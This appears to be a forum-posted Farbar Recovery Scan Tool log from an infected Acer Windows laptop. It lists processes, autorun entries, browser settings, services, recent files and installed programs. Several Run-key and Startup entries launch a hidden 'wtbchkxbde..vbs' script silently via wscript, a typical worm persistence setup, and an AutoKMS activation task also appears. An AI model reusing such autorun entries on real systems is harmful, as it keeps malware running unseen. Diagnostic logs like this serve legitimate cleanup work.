C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) 
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Registry (Whitelisted) ================== HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.) HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation) HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation) HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor) HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations) HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.) 
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated) HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation) HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.) HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.) HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.) HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.) 
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-19\...\Run: [Sidebar] => C:\Program Files\Windows Sidebar\Sidebar.exe [1475072 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-20\...\Run: [Sidebar] => C:\Program Files\Windows Sidebar\Sidebar.exe [1475072 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies) Tcpip\Parameters: [DhcpNameServer] 172.20.10.1 FireFox: ======== FF Plugin: @microsoft.com/GENUINE - disabled No File FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @microsoft.com/GENUINE - disabled No File FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) 
Chrome: ======= CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll () CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll () CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.) CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation) CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation) CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15] CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15] CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15] CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15] CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10] ==================== Services (Whitelisted) ================= R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. 
KG) R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG) R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated) R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software) R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated) ==================== Drivers (Whitelisted) ==================== R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG) R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG) R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG) R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software) ==================== NetSvcs (Whitelisted) =================== ==================== One Month Created Files and Folders ======== 2014-04-14 10:43 - 2014-04-14 10:43 - 00017845 _____ () C:\Users\Franz\Desktop\FRST.txt 2014-04-14 10:43 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST 2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe 2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe 2014-04-09 11:27 - 2014-04-09 11:27 - 00000076 _____ () C:\Users\Franz\Desktop\Neues Textdokument.txt 2014-04-09 11:26 - 2013-09-22 17:47 - 00073266 ___SH () C:\Users\Franz\Desktop\wtbchkxbde..txt 2014-04-09 11:25 - 2014-04-09 11:25 - 00023940 _____ () C:\Users\Franz\Desktop\smadav.log 2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 __SHD () C:\[Smad-Cage] 2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files 2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD 2014-04-02 08:42 - 2014-04-07 09:25 - 
00000000 ____D () C:\Users\Franz\Desktop\Antivir 2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss 2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE 2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton 2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv 2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv 2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 ___SH () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs 2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat 2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 __SHD () C:\found.001 2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games 2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu ==================== One Month Modified Files and Folders ======= 2014-04-14 10:43 - 2014-04-14 10:43 - 00017845 _____ () C:\Users\Franz\Desktop\FRST.txt 2014-04-14 10:43 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST 2014-04-14 10:43 - 2013-04-16 19:13 - 01518797 _____ () C:\Windows\WindowsUpdate.log 2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe 2014-04-14 10:29 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-04-14 10:28 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-04-14 10:28 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-04-14 10:28 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups 2014-04-14 10:17 - 2013-04-16 20:29 - 00000043 _____ () 
C:\Users\Public\Documents\AtherosServiceConfig.ini 2014-04-14 10:17 - 2009-07-14 06:51 - 00087045 _____ () C:\Windows\setupact.log 2014-04-14 10:16 - 2013-04-16 22:17 - 00000266 _____ () C:\Windows\Tasks\AutoKMS.job 2014-04-14 10:16 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-04-14 02:10 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc 2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD 2014-04-12 00:15 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat 2014-04-12 00:15 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat 2014-04-12 00:15 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 2014-04-09 11:27 - 2014-04-09 11:27 - 00000076 _____ () C:\Users\Franz\Desktop\Neues Textdokument.txt 2014-04-09 11:25 - 2014-04-09 11:25 - 00023940 _____ () C:\Users\Franz\Desktop\smadav.log 2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 __SHD () C:\[Smad-Cage] 2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files 2014-04-07 09:25 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir 2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE 2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss 2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox 2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox 2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton 2014-04-02 08:03 - 2013-04-16 20:10 
- 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos 2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent 2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat 2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 __SHD () C:\found.001 2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games 2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache 2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu Some content of TEMP: ==================== C:\Users\Franz\AppData\Local\Temp\AskSLib.dll C:\Users\Franz\AppData\Local\Temp\avgnt.exe C:\Users\Franz\AppData\Local\Temp\CNFNOT32.EXE_0004.exe C:\Users\Franz\AppData\Local\Temp\DW20.EXE_0001.exe C:\Users\Franz\AppData\Local\Temp\MSOHTMED.EXE.x64.exe C:\Users\Franz\AppData\Local\Temp\MSOHTMED.EXE.x86.exe C:\Users\Franz\AppData\Local\Temp\ONELEV.EXE_1031.exe C:\Users\Franz\AppData\Local\Temp\Quarantine.exe C:\Users\Franz\AppData\Local\Temp\SCANPST.EXE_0002.exe C:\Users\Franz\AppData\Local\Temp\VSTOInstaller_exe_x86.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25.exe C:\Users\Franz\AppData\Local\Temp\{AADC5B76-0A49-47B1-96B7-3174A4380421}-34.0.1847.116_33.0.1750.154_chrome_updater.exe ==================== Bamital & volsnap Check ================= C:\Windows\System32\winlogon.exe => MD5 is legit C:\Windows\System32\wininit.exe => MD5 is legit C:\Windows\SysWOW64\wininit.exe => MD5 is legit C:\Windows\explorer.exe => MD5 is legit C:\Windows\SysWOW64\explorer.exe => MD5 is legit C:\Windows\System32\svchost.exe => MD5 is legit C:\Windows\SysWOW64\svchost.exe => MD5 is legit C:\Windows\System32\services.exe => MD5 is legit C:\Windows\System32\User32.dll => MD5 is legit C:\Windows\SysWOW64\User32.dll => MD5 is legit 
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================

--- --- ---

Addition.txt:
Code:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-04-2014 01
Ran by Franz at 2014-04-14 10:44:16
Running from C:\Users\Franz\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

AV: Avira Desktop (Enabled - Out of date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Desktop (Enabled - Out of date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

µTorrent (HKCU\...\uTorrent) (Version: 3.3.2.30488 - BitTorrent Inc.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.60 - NewTech Infosystems)
Acer Crystal Eye webcam (HKLM-x32\...\{51F026FA-5146-4232-A8BA-1364740BD053}) (Version: 1.0.3.5 - Liteon)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3011 - Acer Incorporated)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 5.02.3001 - Acer Incorporated)
Acer Updater (HKLM-x32\...\{EE171732-BEB4-4576-887D-CB62727F01CA}) (Version: 1.02.3001 - Acer Incorporated)
Acer VCM (HKLM-x32\...\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}) (Version: 4.05.3002 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe AIR (x32 Version: 1.5.0.7220 - Adobe Systems Inc.) Hidden
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.45.2 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{6030FCD7-8F1A-427D-AF05-8DD1A2EA2ABA}) (Version: 1.5.17.05094 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 1.5.17.05094 - Alcor Micro Corp.) Hidden
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.105.2015.1110 - Alps Electric)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.20 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{F5816A09-786E-C91D-3D99-8A8C92648750}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Avira Free Antivirus (HKLM-x32\...\Avira AntiVir Desktop) (Version: 14.0.3.350 - Avira)
Backup Manager Basic (x32 Version: 2.0.0.60 - NewTech Infosystems) Hidden
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.01.000.18 - Atheros Communications)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden Catalyst Control Center Core Implementation (x32 Version: 2010.0421.657.10561 - ATI) Hidden Catalyst Control Center Graphics Full Existing (x32 Version: 2010.0421.657.10561 - ATI) Hidden Catalyst Control Center Graphics Full New (x32 Version: 2010.0421.657.10561 - ATI) Hidden Catalyst Control Center Graphics Light (x32 Version: 2010.0421.657.10561 - ATI) Hidden Catalyst Control Center Graphics Previews Vista (x32 Version: 2010.0421.657.10561 - ATI) Hidden Catalyst Control Center InstallProxy (x32 Version: 2010.0421.657.10561 - ATI Technologies, Inc.) Hidden Catalyst Control Center Localization All (x32 Version: 2010.0421.657.10561 - ATI) Hidden CCC Help Chinese Standard (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Chinese Traditional (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Czech (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Danish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Dutch (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help English (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Finnish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help French (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help German (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Greek (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Hungarian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Italian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Japanese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Korean (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Norwegian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Polish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Portuguese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Russian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Spanish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden 
